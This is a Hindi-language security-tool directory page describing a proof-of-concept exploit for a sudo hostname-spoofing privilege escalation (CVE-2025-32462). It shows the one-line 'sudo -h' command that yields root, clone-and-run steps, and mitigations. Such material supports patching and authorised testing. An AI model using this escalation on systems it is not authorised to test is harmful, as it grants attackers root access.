Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32462-Exploit — CVE-2025-32462 के लिए PoC एक्सप्लॉइट, होस्टनाम स्पूफिंग के माध्यम से sudo प्रिविलेज एस्केलेशन। कमजोर सिस्टम (< 1.9.17) पर रूट एक्सेस प्राप्त करने के लिए होस्टनाम-आधारित प्रतिबंधों को बायपास करने का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

CVE-2025-32462 के लिए PoC एक्सप्लॉइट, होस्टनाम स्पूफिंग के माध्यम से sudo प्रिविलेज एस्केलेशन। कमजोर सिस्टम (< 1.9.17) पर रूट एक्सेस प्राप्त करने के लिए होस्टनाम-आधारित प्रतिबंधों को बायपास करने का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-32462-Exploit: मैट्रिक्स-सुडो एस्केप

होस्टनाम स्पूफिंग विशेषाधिकार वृद्धि (CVE-2025-32462)

"आप नीली गोली लेते हैं... कहानी खत्म होती है। आप लाल गोली लेते हैं... आपको रूट मिलता है।"

विवरण

यह एक्सप्लॉइट sudo (CVE-2025-32462) में एक विशेषाधिकार वृद्धि कमजोरी प्रदर्शित करता है जहां -h फ्लैग का उपयोग करके होस्टनाम-आधारित प्रतिबंधों को दरकिनार किया जा सकता है। पीओसी एक प्रतिबंधित उपयोगकर्ता वातावरण बनाता है, फिर एक श्वेतसूचीबद्ध होस्टनाम को स्पूफ करके उससे बचकर रूट एक्सेस प्राप्त करता है।

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Spoof whitelisted hostname
[root@matrix-node]# id                          # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)

तकनीकी विवरण

  • कमजोर सुडो संस्करण: < 1.9.17
  • हमला वेक्टर: स्थानीय विशेषाधिकार वृद्धि
  • मुख्य दोष: sudo -h पैरामीटर के माध्यम से होस्टनाम सत्यापन बाईपास
  • प्रभाव: प्रतिबंधित उपयोगकर्ता अनुचित रूप से कॉन्फ़िगर किए गए सिस्टम पर रूट प्राप्त कर सकते हैं

उपयोग

रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

निष्पादन योग्य बनाएं और चलाएं:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

प्रदर्शित करने के लिए इंटरैक्टिव प्रॉम्प्ट का पालन करें:

  • CVE-2025-32462 कमजोरी का पता लगाना
  • उपयोगकर्ता निर्माण
  • होस्टनाम प्रतिबंध सेटअप
  • एक्सप्लॉइट निष्पादन
  • सफाई

सुरक्षा

  • ✅ सुडो को v1.9.17+ में अपडेट करें
  • ✅ होस्टनाम-आधारित सुडो प्रतिबंधों से बचें
  • ✅ इसके बजाय समूह-आधारित सुडो नीतियों का उपयोग करें

कानूनी

केवल शैक्षिक/अनुसंधान उद्देश्यों के लिए। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति है।

टूल डाउनलोड करें